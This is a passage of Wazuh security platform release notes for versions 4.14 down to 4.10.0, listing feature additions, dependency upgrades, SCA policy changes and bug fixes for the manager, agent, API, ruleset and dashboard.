  • #31449 Reworked SCA policy for Microsoft Windows 10 Enterprise.

Other
  • #31422 Upgraded the starlette dependency to version 0.47.2.

  • #32782 Upgraded the embedded Python interpreter to version 3.10.19.

  • #32900 Updated curl dependency to version 8.12.1.

  • #32294 Updated LUA to version 5.4.6.

  • #32294 Updated libarchive to version 3.8.0.

Wazuh dashboard
  • #7804 Upgraded the axios dependency to version 1.12.2.

  • #7841 Improved column order in IT Hygiene > Network > Traffic view to follow a logical source-to-destination flow.

  • #7639 Improved integrity monitoring settings terminology by clarifying file and registry labels, and updating component names for better user understanding.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #32045 Fixed manager vulnerability scan not triggering due to incorrect Syscollector event provider topic name.

  • #32787 Fixed IndexerConnector abuse control to prevent data loss on failed syncs.

  • #32107 Fixed user tag handling by adding user as an alias for the dstuser static field.

  • #32057 Fixed JSON validation issues in Analysisd and SCA components.

  • #32829 Fixed a bug in Vulnerability Scanner where the database offset was updated even in error cases.

Wazuh agent
  • #32383 Fixed indefinite waiting in FIM whodata health check.

  • #31241 Fixed graceful shutdown in FIM.

  • #32049 Verified the SHA256 of commands on every execution.

  • #32528 Fixed duplicate <ca_store> configuration block during RPM package upgrades.

  • #31144 Fixed a bug that prevented overwriting <registry_limit> or <file_limit> options from remote configuration.

  • #29853 Fixed a bug in Logcollector that prevented following symlinks when resolving wildcarded files.

  • #31222 Unified detection logs for wildcarded files in Logcollector.

  • #32027 Fixed a bug in FIM that did not recognize Registry keys unless they were UTF-8.

  • #32731 Fixed a bug in Logcollector that ignored all files with <age> filter on Windows.

  • #32812 Reverted IT Hygiene package vendor format on Debian to include name and email again.

  • #32785 Fixed a bug in IT Hygiene that reported duplicated Edge browser extensions.

  • #32838 Fixed reload of the <labels> block via remote configuration.

  • #32836 Fixed Windows installer to deploy SCA policies for Windows 2022 instead of Windows Server 2025.

Ruleset
  • #31349 Fixed bug in Windows SCA.

  • #31102 Fixed mistaken alert.

  • #31886 Fixed SCA checks in Oracle Linux 9.

  • #32509 Fixed bugs in Windows Server 2016 SCA.

  • #32523 Fixed bugs in PAM decoder.

  • #32480 Fixed macOS Sequoia SCA scans that produced errors.

  • #32802 Fixed Windows Server 2016 SCA policy configuration issue.

Wazuh dashboard
  • #7689 Fixed navigation issue in the MITRE ATT&CK framework details flyout.

  • #7710 Fixed event count evolution visualization in the Endpoint Details view to use the server API context filter.

  • #7783 Fixed sorting by agent count in Top 5 Groups visualization in Endpoints summary.

  • #7803 Fixed System Inventory displaying incorrect agent data after switching agents in the Endpoint Details view.

  • #7838 Replaced the Microsoft Graph API module icon with the official Microsoft Graph API logo for better specificity.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.14.0 Release notes - 23 October 2025

This section lists the changes in version 4.14.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

The 4.14.0 release enhances the IT Hygiene capability with an expanded inventory that now includes browser extensions, endpoint services, users, and groups. It also introduces a new Microsoft Graph API dashboard for monitoring activity and audit events from Microsoft cloud services, and adds support for hot reload of Wazuh agent configuration. In addition, this release introduces multiple stability, performance, and security improvements across the platform.

  • Inventory – Browser Extensions: Added a unified inventory model to track browser extensions across Windows, macOS, and Linux systems. Enables security auditing and compliance monitoring for Chrome, Firefox, Safari, and other browsers.

  • Inventory – Services: Introduced a normalized inventory of Windows services and Linux systemd units. Provides visibility into service states, startup types, and critical services across endpoints.

  • Inventory – Users & Groups: Implemented a cross-platform inventory for system users and groups. Supports normalized data structures, relationships, and consistent queries across agents, Wazuh-DB, and the Dashboard.

  • Wazuh agent configuration hot reload: The Wazuh Agent can now apply remote configuration changes dynamically without breaking its connection to the server. All daemons except agentd are restarted during reload, improving resilience and reducing disruptions across large deployments.

  • Microsoft Graph API dashboard: A new dashboard has been added to visualize and query Microsoft Graph services, including Microsoft Azure cloud events.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #30848 Added system users and groups to the inventory data.

  • #31614 Added browser extensions and services to the inventory data.

  • #31731 Added IPv6 support to the Maltiverse integration.

  • #30192 Improved databaseFeedManagerTesttool.

  • #30793 Adapted wazuh-maild to the RFC5322 standard.

  • #31218 Improved the Active Response endpoint performance.

Wazuh agent
  • #30235 Added support for Parquet version 2 in the AWS wodle.

  • #30797 Added hot configuration reload support for Linux agents.

  • #31163 Added support for Amazon Inspector v2.

  • #30369 Added system users and groups to the inventory data.

  • #805 Added browser extensions to the inventory data.

  • #807 Added services to the inventory data.

  • #31418 Added missing AWS regions us-gov-west-1 and us-gov-east-1 to the AWS wodle.

  • #32413 Added Windows kernel version information to IT Hygiene.

  • #31640 Changed rootkit error messages to warnings due to future deprecation.

RESTful API
  • #30913 Added Syscollector users and groups endpoints.

  • #31513 Added Syscollector services and browser_extensions endpoints.

Ruleset
  • #30745 Added SCA content for Rocky Linux 10.

  • #31747 Added SCA content for Debian 13.

Other
  • #31272 Updated packaging dependency to 25.0.

  • #30536 Updated requests to version 2.32.4.

  • #30624 Updated urllib3 to version 2.5.0 and protobuf to version 5.29.5.

  • #30916 Upgraded Python embedded interpreter to 3.10.18.

  • #31779 Updated OpenSSL to 3.0.15 and cpp-httplib to v0.25.0.

  • #29586 Updated SQLite dependency to version 3.50.4.

Wazuh dashboard
  • #7777 Added visualizations field validations when creating wazuh-states index patterns.

  • #7554 Created Users & Groups inventories. #7587 #7792 #7787

  • #7586 Added the ability to set the Wazuh data path (wazuh directory) within the directory defined through the path.data setting.

  • #7641 Added a new Browser Extensions tab in IT Hygiene. #7696 #7729 #7774 #7785

  • #7516 Added Microsoft Graph API module. #7644 #7661

  • #7646 Added a new Services tab in IT Hygiene. #7695 #7729 #7773 #7790

  • #7711 Added a final step in the Deploy new agent section to navigate back to the agent list.

  • #7712 Updated OS logos.

  • #7742 Changed the Services tab label to Listeners in IT Hygiene > Networks.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #29663 Fixed internal decoder RC startup.

  • #29673 Fixed queue stats RC over wazuh-analysisd.

  • #29672 Fixed race condition in the event queue.

  • #29699 Fixed regexCompile race condition.

  • #30653 Fixed malformed alerts in alerts.log when the <group> tag contains newline characters.

  • #31599 Fixed and improved dpkg version comparison algorithm in Vulnerability Detector.

Wazuh agent
  • #30831 Fixed errors in Azure Graph event fields.

  • #30877 Added the missing prov`i`der field to the whodata section in the syscheckd JSON configuration.

  • #31700 Fixed journald disabled filters when both configuration blocks have no filters.

  • #30215 Fixed whodata FIM compatibility with the latest audit versions.

  • #31875 Fixed mismatch between MTU values in the database and indexer for Windows agents.

RESTful API
  • #31046 Fixed secure headers configuration.

  • #31315 Fixed display of sensitive information for non-privileged users.

Ruleset
  • #29976 Fixed multiple Rocky Linux SCA checks generating incorrect results.

  • #30173 Fixed missing check (2.3.7.6) in Windows Server 2019 v2.0.0.

  • #30276 Fixed camel casing in ownCloud ruleset header.

  • #30489 Fixed false positive in check 2.3.3.2 for macOS 13, 14, and 15 SCA.

  • #30529 Fixed bug in rule 92657.

  • #30528 Fixed field names in Office 365 rules.

  • #30515 Fixed action field in Fortigate rules.

  • #30612 Fixed Auditd EXECVE sibling decoders.

  • #31227 Fixed issues with Windows OS languages other than English.

  • #30717 Reworked SCA policy for Debian Linux 12.

  • #32025 Fixed missing comma in 0393-fortiauth_rules.xml.

  • #32102 Fixed Windows SCA user account checks.

  • #32106 Fixed inaccuracies in Ubuntu 24.04 SCA policy.

  • #32143 Fixed incorrect service name in Ubuntu firewall service check.

Wazuh dashboard
  • #7811 Fixed missing scan settings in Inventory Data.

  • #7796 Fixed the Endpoint summary to correctly display outdated agents without filters, resolving previous inconsistencies.

  • #7596 Fixed missing provider and queue_size fields in whodata configuration.

  • #7630 Fixed an error that caused PDF report tables to overflow the page width.

  • #7611 Fixed TypeError when changing API host ID in wazuh.yml configuration.

  • #7669 Fixed behavior and appearance alignment with OpenSearch (Wazuh Indexer) Dev Tools.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.13.1 Release notes - 24 September 2025

This section lists the changes in version 4.13.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh dashboard
  • #7752 Changed the label from Packages to Unique packages in the KPI for IT Hygiene > Software.

Resolved issues

This release resolves known issues as the following:

Wazuh dashboard
  • #7753 Fixed RBAC validation for reload button to prevent API failures when users lack cluster:restart permission.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.13.0 Release notes - 18 September 2025

This section lists the changes in version 4.13.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

The 4.13.0 release improves deployment flexibility, enhances centralized data access, and strengthens platform resilience. Key highlights include the introduction of the IT Hygiene dashboard, which provides users with the ability to centrally view and query IT Hygiene data.

  • Global queries for IT Hygiene data: Wazuh now supports global queries for IT Hygiene data through a newly dedicated IT Hygiene dashboard

  • Reliability and performance improvements across the platform.

  • Multiple bug fixes in core components and the UI.

  • Updates based on recent security scans.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #29232 Improved reports functionality to avoid duplicated daily FIM reports.

  • #29363 Optimized agent query endpoints.

  • #29406 Implemented RBAC resource cache with TTL support.

  • #29514 Improved Wazuh-DB protocol to support large HTTP requests and remove pagination.

  • #29515 Added HTTP client implementation to wazuh-db.

  • #29458 Added hot ruleset reload support to Analysisd.

  • #29916 Enabled CVE re-indexing when documents change in Vulnerability Detector.

  • #29153 Separated control messages from remoted's connection handling.

  • #30504 Added sanity checks for hotfix values in Vulnerability Detector.

  • #30851 Improved exception handling in the run_local SDK function.

  • #29135 Improved Authd connection management using epoll to handle concurrent agent registration requests more efficiently.

  • #31114 Added a single writer buffer manager instance for each indexer connector instance.

Wazuh agent
  • #29391 Added support for Rocky Linux and AlmaLinux in the upgrade module.

  • #29393 Added handling of CentOS 9 SCA files in package specs.

  • #29139 Added SCA support for Oracle Linux 10.

  • #30556 Added Rootcheck rule to detect root-owned files with world-writable permissions.

  • #29426 Improved agent synchronization to reduce redundant payload transfers.

  • #28688 Improved Syscollector to report only Python packages managed by dpkg.

  • #29399 Improved wazuh-db JSON handling performance.

  • #29930 Enhanced Azure module logging.

  • #29940 Improved restart behavior on macOS agents after upgrade.

  • #29443 Standardized service timeouts across components.

  • #30377 Added MS Graph token validation before performing requests.

  • #30763 Added support for UTF-8 characters in file paths in FIM.

  • #30637 Removed internal_key from query filters.

RESTful API
  • #29524 Added server UUID to the /manager/info endpoint.

  • #29589 Added /agents/summary endpoint.

  • #31459 Added ruleset reload endpoints.

Ruleset
  • #29269 Added SCA content for CentOS Stream 9.

  • #29653 Added IOCs and new rules to improve the 4.x ruleset.

  • #29139 Added SCA content for Oracle Linux 10.

  • #28790 Added rule to minimize Windows event flooding on the manager.

Other
  • #29610 Updated Python dependencies: setuptools, Jinja2, and PyJWT.

  • #28646 Upgraded embedded Python interpreter to 3.10.16.

  • #29735 Upgraded h11 to 0.16.0 and httpcore to 1.0.9.

  • #28564 Removed unused Azure Python dependencies.

Wazuh dashboard
  • #7368 Added It Hygiene application. #7461 #7476 #7475 #7513 #7582 #7588 #7692 #7717

  • #7368 Added hardware and system information to the agent overview.

  • #7379 Added persistence for selected columns and page size in data grid settings. #7513

  • #7373 Added the ability to manage the sample data from IT Hygiene and vulnerabilities. #7449 #7475 #7718

  • #7443 Added back button to Deploy Agent page that redirects to Endpoints Summary.

  • #7412 Added UUID field to the APIs table.

  • #7373 Moved /elastic/samplealerts API endpoints to /indexer/samplealerts.

  • #7430 Changed macOS agent startup command.

  • #7368 Removed Inventory data view from agent overview.

  • #7475 Removed vulnerability.pattern setting.

  • #7368 Removed GET /api/syscollector API endpoint.

  • #7368 Removed inventory data report and POST /reports/agents/{agentID}/inventory API endpoint.

  • #7483 Removed the enrollment.password field from the /utils/configuration endpoint response to prevent unauthorized agent registration by users with read-only API roles.

  • #7657 Changed the manager reset button to reload in Rules, Decoders, and CDB list. #7677

  • #7484 Reduced the number of API calls to retrieve agent summary information.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #29181 Fixed missing agent version handling in Vulnerability Detector.

  • #29624 Fixed race condition in agent status synchronization between worker and master.

  • #30534 Fixed agent-group assignment for missing agents with improved error handling.

  • #30818 Fixed missing OS info updates in global inventory after first scan.

  • #31048 Fixed wazuh-db failure during agent restarts by switching the restart query to HTTP.

  • #30627 Fixed DFM graceful shutdown.

  • #30718 Fixed inode field as string in FIM JSON messages to ensure schema consistency.

  • #30837 Fixed duplicate OS vulnerabilities detected after an OS version change.

Wazuh agent
  • #29312 Fixed incorrect event handling in the Custom logs bucket.

  • #29317 Fixed Azure blob download race condition.

  • #28962 Fixed false FIM reports and configuration upload issues.

  • #29502 Fixed incorrect IPv6 format reported by WindowsHelper.

  • #29561 Fixed hidden port detection and netstat fallback.

  • #29905 Replaced select() with sleep() in Logcollector to avoid Docker-related errors.

  • #30060 Fixed NetNTLMv2 exposure by filtering UNC paths and mapped drives in Windows agent.

  • #29820 Fixed Windows agent not starting after manual upgrade by deferring service start to post-install.

  • #30552 Fixed precision loss in the FIM inode field for values greater than 2^53.

  • #30614 Fixed expanded file list in the logcollector getconfig output.

  • #31187 Fixed authd.pass ACL permissions to match client.keys security level in the Windows agent installer.

RESTful API
  • #29166 Fixed version sorting in agent list endpoint.

  • #28962 Fixed false positive detection during configuration uploading.

Ruleset
  • #29221 Fixed bugs in Windows 11 Enterprise SCA policy.

  • #29040 Fixed multiple SCA check errors in RHEL 9/10 and Rocky Linux 8/9.

  • #28982 Fixed diff logic in rootcheck that caused false negatives.

  • #28711 Fixed incorrect SCA results for RHEL 8 and CentOS 7.

  • #30827 Fixed false positives in Ubuntu 24.04 benchmark.

Wazuh dashboard
  • #7368 Fixed a problem in Vulnerabilities > Dashboard and Inventory when there are no indices matching with the index pattern.

  • #7425 Fixed double backslash warning on xml editor.

  • #7422 Fixed the X-axis label in the Vulnerabilities by year of publication visualization.

  • #7501 Fixed a bug in Rule details flyout, where it didn't map all the compliances.

  • #7540 Fixed the Windows service name in Deploy new agent.

  • #7552 Fixed an issue where filter values could change on navigation or pin/unpin actions, causing unexpected search results.

  • #7544 Fixed an issue in the expanded table row where outdated information could appear when using the refresh button.

  • #7550 Fixed a bug causing format issues in CSV reports.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.12.0 Release notes - 7 May 2025

This section lists the changes in version 4.12.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

Wazuh 4.12.0 introduces functional improvements that expand the platform’s capabilities and compatibility. This release supports ARM architecture in central components, allowing Wazuh to run on a wider range of hardware. It also enhances threat intelligence by adding CTI references to the CVE data, providing better context for vulnerabilities. Additionally, it introduces eBPF support for the File Integrity Monitoring (FIM) module, enabling more efficient and modern monitoring on Linux endpoints.

Breaking changes
  • OpenSearch 2.19.1 and Apache Lucene upgrade: Wazuh 4.12.0 upgrades to OpenSearch 2.19.1 and updates the Apache Lucene version. This change affects compatibility with previous versions. As a result, downgrades are not supported. Once you upgrade the Wazuh indexer to version 4.12.0, you cannot revert to an earlier version.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #26652 Added new compilation flags for the Vulnerability Detection module.

  • #26083 Added support for central components in ARM architectures.

  • #28220 Added functionality to navigate to CTI links related to specific CVE detections from states and alerts.

  • #27614 Updated curl dependency to 8.11.0.

  • #28298 Upgraded cryptography package to version 44.0.1.

  • #28047 Converted server logs timestamp to UTC.

  • #28149 Removed restriction for aws_profile in Security Lake.

  • #28038 Removed error logs when the response is 409 for certain OpenSearch calls.

  • #27451 Upgraded packages: python-multipart to 0.0.20, starlette to 0.42.0, and Werkzeug to 3.1.3.

  • #27990 Removed warning about events in cloudwatchlogs.

  • #27603 Added package condition field in indexed vulnerabilities.

Wazuh agent
  • #27956 Added eBPF-based integration to support whodata in FIM.

  • #28416 Added support for the riskDetections relationship in MS Graph.

  • #28389 Added time delay option in MS Graph integration to prevent log loss.

  • #28276 Added page size option to MS Graph integration.

  • #28388 Implemented Journald rotation detection in Logcollector.

Ruleset
  • #26732 Added SCA content for Windows Server 2025.

  • #26736 Added SCA content for Fedora 41.

  • #26837 Created SCA policy for Distribution Independent Linux.

  • #23194 Created SCA policy for Ubuntu 24.04 LTS.

  • #26982 Improved SCA rule for macOS 15.

Wazuh dashboard
  • #7182 Added setting to limit the number of rows in CSV reports.

  • #7306 Added vulnerability.scanner.reference field containing the CTI reference of the vulnerability.

  • #7192 Refined queue usage visualizations in Statistics.

  • #7390 Removed revision number from About page.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #26720 Fixed inconsistent vulnerability severity categorization by correcting CVSS version prioritization.

  • #26769 Fixed a potential crash in Wazuh-DB by improving the PID parsing method.

  • #28185 Fixed concurrent mechanism on column family RocksDB.

  • #28503 Fixed unused variables in Analysisd.

  • #29050 Fixed Analysisd startup failure caused by mixing static and dynamic rules with the same ID.

  • #27834 Fixed crash in Vulnerability Scanner when processing delayed events during agent re-scan.

  • #26679 Improved signal handling during process stop.

  • #27750 Improved cleanup logic for the content folder in the VD module.

  • #27806 Sanitized invalid size values from package data provider events.

  • #26704 Fixed crash when reading email alerts missing the email_to attribute.

  • #29179 Fixed offset errors by updating the DB only after processing events.

Wazuh agent
  • #26647 Fixed a bug that could cause wazuh-modulesd to crash at startup.

  • #26289 Fixed incorrect UTF-8 character validation in FIM. Thanks to @zbalkan.

  • #27100 Improved URL validation in Maltiverse integration.

  • #28005 Fixed issue in Syscollector where package sizes were reported as negative.

  • #29161 Fixed enrollment failure on Solaris 10 caused by unsupported socket timeout.

  • #29214 Fixed memory issue in the wazuh-agentd argument parser.

  • #28928 Fixed WPK package upgrades for DEB when upgrading from version 4.3.11 or earlier.

Wazuh dashboard
  • #7185 Fixed issue where adding the same filter twice wouldn't display it in the search bar.

  • #7171 Fixed rendering of rows in CDB list table when they start with quotes.

  • #7206 Fixed width of long fields in the document detail flyout.

  • #7267 Fixed logging of UI logs due to an undefined logger property.

  • #7278 Fixed TOP-5-SO filter management in Endpoints > Summary.

  • #7304 Fixed CSV export not filtering by time range.

  • #7336 Fixed agent view not displaying the latest agent state.

  • #7377 Fixed saved queries not appearing in the search bar.

  • #7401 Fixed monitoring cronjob infinite retries in case of a request exception.

  • #7399 Fixed double scroll bar in Discover.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.11.2 Release notes - 1 April 2025

This section lists the changes in version 4.11.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #28797 Improved Wazuh DB performance using built-in types.

RESTful API
  • #28653 Added the authentication_pool_size option to customize the number of authentication processes in the Wazuh server API configuration.

Resolved issues

This release resolves known issues as the following:

Wazuh dashboard
  • #7370 #7371 Fixed several broken Wazuh documentation links.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.11.1 Release notes - 12 March 2025

This section lists the changes in version 4.11.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh agent
  • #28075 Changed ms-graph page size to 50.

  • #28045 Removed ca.com domain filter from the Rootcheck malware ruleset.

Wazuh dashboard
  • #7318 Added missing fields to the default fields list of the alerts index pattern.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #28294 Fixed the OS CPE build for package scans with data from Wazuh-DB.

  • #28292 Added delete by query logic when indexer is disabled.

  • #28396 Fixed heap buffer overflow in Analysisd rule parser.

  • #28429 Fixed unnecessary data copy during curl calls.

Wazuh agent
  • #28339 Improved agent connectivity.

  • #28516 Applied the agent.recv_timeout timeout to the agent enrollment process to prevent it from waiting indefinitely for a response.

Wazuh dashboard
  • #7299 Fixed documentation links related to agent management.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.11.0 Release notes - 20 February 2025

This section lists the changes in version 4.11.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

The 4.11 release introduces significant improvements in vulnerability detection, system inventory accuracy, and virtual machine base OS updates. The focus is on enhancing security insights, ensuring up-to-date system compatibility, and improving detection mechanisms for installed software. Key updates include the enhancement of the vulnerability detection process for CNA (CVE Numbering Authority), updates to AMI and OVA base operating systems, and improvements to Syscollector's software detection capabilities.

Key features include the following:

  • Vulnerability detection CNA enhancement: The vulnerability scanner now prioritizes CISA-sourced vulnerability data over the NVD, ensuring more accurate and detailed vulnerability assessments. This enhancement reduces false positives and improves alignment with official security sources.

  • AMI and OVA base OS update: The base OS for AMI and OVA has been updated to Amazon Linux 2023 (AL2023) due to security vulnerabilities in Amazon Linux 2 (AL2) and its approaching end of life.

  • Syscollector's software detection improvement: Syscollector now provides enhanced detection of installed software. Improvements include better package identification in macOS, expanded detection of pip and npm installations, and integration with Windows WMI to capture system updates more accurately.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #27771 Improved delimiters on XML.

  • #27893 Improved FIM decoder.

  • #27835 Improved SCA and Syscheck decoders.

  • #27914 Improved CISCAT decoder detection messages.

  • #27692 Added CISA vulnerability content and prioritized it over NVD in the vulnerability scanner.

  • #28195 Changed ms-graph page size.

Wazuh agent
  • #26706 Improved Syscollector hotfix coverage on Windows by integrating WMI and WUA APIs.

  • #26782 Extended Syscollector capabilities to detect installed .pkg packages.

  • #26236 Updated standard Python and NPM package location in Syscollector to align with common installation paths.

Wazuh dashboard
  • #7193 Refined the layout of the agent details view.

  • #7195 Changed the width of the command column, relocate argvs column and change the width of the rest of the columns in the table processes.

  • #7245 Removed unused node_build field in the package manifest of the wazuh plugin.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #26132 Enabled inventory synchronization in Vulnerability Detector when the Indexer module is disabled.

Wazuh agent
  • #27739 Fixed error in event processing on AWS Custom Logs Buckets module.

RESTful API
  • #26255 Added the security:revoke action to the PUT /security/user/revoke endpoint.

Wazuh dashboard
  • #7251 Fixed documentation URL related to the usage of the authentication password in agent deployment.

  • #7255 Fixed a problem with duplicated requests to get the list of valid index patterns in the menu.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.10.3 Release notes - 19 August 2025

This section lists the changes in version 4.10.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Other
  • #30829 Updated requests to version 2.32.4 (backport from 4.14.0).

  • #30829 Updated urllib3 to version 2.5.0 and protobuf to version 5.29.5 (backport from 4.14.0).

  • #29933 Updated dependencies: setuptools, Jinja2, and PyJWT (backport from 4.14.0).

Resolved issues

This release resolves known issues as the following:

Wazuh dashboard
  • #7648 Fixed a bug that caused a format issue in CSV reports.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.10.2 Release notes - 22 May 2025

This section lists the changes in version 4.10.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #29633 Improved SCA and Syscheck decoders. (Backport from 4.11.0)

Other
  • #29669 Upgraded python-multipart to 0.0.20, starlette to 0.42.0, Werkzeug to 3.1.3 (backport from 4.12.0), h11 to 0.16.0, and httpcore to 1.0.9.

Wazuh dashboard
  • #7433 Added a test to verify that table column fields are known, and updated the known fields of the alerts index with new ones.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #29612 Enabled inventory synchronization in Vulnerability Detector when the Indexer module is disabled. (Backport from 4.11.0)

  • #29613 Fixed OS CPE build for package scans with data from Wazuh-DB. (Backport from 4.11.1)

  • #29599 Fixed heap buffer overflow in Analysisd rule parser. (Backport from 4.11.1)

  • #29615 Improved signal handling during process stop. (Backport from 4.12.0)

  • #29616 Fixed crash when reading email alerts missing the email_to attribute. (Backport from 4.12.0)

Wazuh agent
  • #29598 Fixed a bug that could cause wazuh-modulesd to crash at startup. (Backport from 4.12.0)

  • #29600 Fixed WPK package upgrades for DEB when upgrading from version 4.3.11 or earlier. (Backport from 4.12.0)

  • #29635 Fixed error in event processing on the AWS Custom Logs Buckets module. (Backport from 4.11.0)

  • #29604 Improved URL validation in the Maltiverse integration. (Backport from 4.12.0)

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.10.1 Release notes - 16 January 2025

This section lists the changes in version 4.10.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh dashboard
  • #7233 Added comma separators to numbers.

  • #7226 Moved the ability to manage the visibility of fields in Events and Vulnerability Detection > Inventory tables from the Columns button to a new Available fields button, enhancing the performance of the view.

  • #7226 Changed the color of the Export formatted button in data grid tables to match the color of the rest of the table buttons.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #27502 Handled HTTP 413 response code in the Indexer connector.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.10.0 Release notes - 9 January 2025

This section lists the changes in version 4.10.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

This release delivers key improvements across several areas, including enhanced debugging, expanded integration capabilities, standardised logging, refined compliance checks, and an improved dashboard user experience.

Key features include the following:

  • Wazuh debug symbols generation: Debug symbols are now generated during builds for macOS, Linux, and Windows, with crash dump generation by default in installers. Adequate documentation is provided for users to disable the crash dump generation process.

  • Standardized logging for cloud integrations: A logger has been introduced to standardize logs for cloud integration modules, improving log management and consistency.

  • Microsoft Intune integration: Integration with Microsoft Intune allows Wazuh to retrieve audit logs from managed devices, process them using built-in decoders and rules, and generate actionable security alerts.

  • Vulnerability evaluation status: A new field has been introduced to indicate whether a vulnerability is under evaluation or disputed, assisting users in tracking vulnerabilities still awaiting analysis in the National Vulnerability Database (NVD).

  • Wazuh Dashboard UI improvements: Several key sections of the Wazuh dashboard have been redesigned to improve the user experience. Changes include updates to the Overview, Events, and Agent detail pages, along with the addition of an Agents management menu. Additionally, there are redesigns of the deploy new agent page, adjustments to the loading logo size, and fixes to the vulnerability inventory table for improved usability.

  • Reworked SCA policies: Numerous SCA policies have been reworked, including policies for Rocky Linux 8, Alma Linux 8, Amazon Linux 2023, Windows Server 2019, RedHat 9, Windows Server 2012 R2, Windows Server 2012 (no R2), Debian 10, Ubuntu 18, Amazon Linux 2, SUSE 15, macOS Ventura, and Windows 11 Enterprise..

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #24333 Added self-recovery mechanism for rocksDB databases.

  • #25189 Improve logging for indexer connector monitoring class.

  • #23760 Added generation of debug symbols.

  • #27320 Improved Vulnerability Scanner performance by optimizing the PEP440 version matcher.

  • #27324 Improved Vulnerability Scanner performance by optimizing version matcher object creation.

  • #27321 Improved Vulnerability Scanner performance by optimizing global data handling.

Wazuh agent
  • #23760 Added generation of debug symbols.

  • #23998 Changed how the AWS module handles non-existent regions.

  • #2006 Changed macOS packages building tool.

  • #7498 Enhanced Wazuh macOS agent installation instructions.

  • #2826 Enhanced Windows agent signing procedure.

  • #23466 Enhanced security by implementing a mechanism to prevent unauthorized uninstallation of the Wazuh agent on Linux endpoints.

  • #24498 Enhanced integration with Microsoft Intune MDM to pull audit logs for security alert generation.

  • #26137 Updated rootcheck old signatures.

RESTful API
  • #24621 Created new endpoint for agent uninstall process.

Ruleset
  • #21794 Created SCA policy for Microsoft Windows Server 2012 (non-R2).

  • #21434 Reworked SCA policy for Microsoft Windows Server 2019.

  • #24667 Reworked SCA policy for Red Hat Enterprise Linux 9.

  • #24991 Reworked SCA policy for Microsoft Windows Server 2012 R2.

  • #24957 Reworked SCA policy for Ubuntu 18.04 LTS and fixed incorrect checks in Ubuntu 22.04 LTS.

  • #24969 Reworked SCA policy for Amazon Linux 2.

  • #24975 Reworked SCA policy for SUSE Linux Enterprise 15.

  • #24992 Reworked SCA policy for Apple macOS 13.0 Ventura.

  • #25710 Reworked SCA policy for Microsoft Windows 11 Enterprise.

Other
  • #25374 Updated the embedded Python version up to 3.10.15.

  • #25324 Upgraded certifi and removed unused packages.

  • #25893 Upgraded external cryptography library dependency version to 43.0.1.

  • #26252 Upgraded external starlette and uvicorn dependencies.

Wazuh dashboard
  • #6964 Added sample data for YARA.

  • #6963 Updated malware detection group values in data sources.

  • #6938 Changed the registration ID of the Settings application for compatibility with OpenSearch Dashboards 2.16.0.

  • #6964 Changed Malware detection dashboard visualizations.

  • #6945 Removed agent RBAC filters from dashboard queries.

  • #7001 Removed GET /elastic/statistics API endpoint.

  • #6968 Added a custom filter and visualization for vulnerability.under_evaluation field. #7044 #7046

  • #7032 Changed MITRE ATT&CK overview description.

  • #7041 Changed the agents summary in overview with no results to an agent deployment help message.

  • #7036 Changed malware feature description.

  • #7033 Changed the font size of the KPI subtitles and the features descriptions.

  • #7059 Changed the initial width of the default columns for each selected field.

  • #7038 Removed VirusTotal application in favor of Malware Detection.

  • #7058 Add vulnerabilities card to agent details page.

  • #7112 Added an Agents management menu and moved the sections: Endpoint Groups and Endpoint Summary which changed its name to Summary.

  • #7119 Added ability to filter from File Integrity Monitoring registry inventory.

  • #7119 Added new field columns and ability to select the visible fields in the File Integrity Monitoring Files and Registry tables.

  • #7081 Added filter by value to document details fields.

  • #7135 Added pinned agent mechanic to inventory data, stats, and configuration for consistent functionality.

  • #7057 Changed the warning icon in events view to an info icon.

  • #7034 Changed feature container margins to ensure consistent separation and uniform design.

  • #7089 Changed inventory, stats and configuration page to use tabs.

  • #7156 Added ability to edit the wazuh.updates.disabled configuration setting from the UI.

  • #7149 Changed styles in the register agent view for consistency of styles across views.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
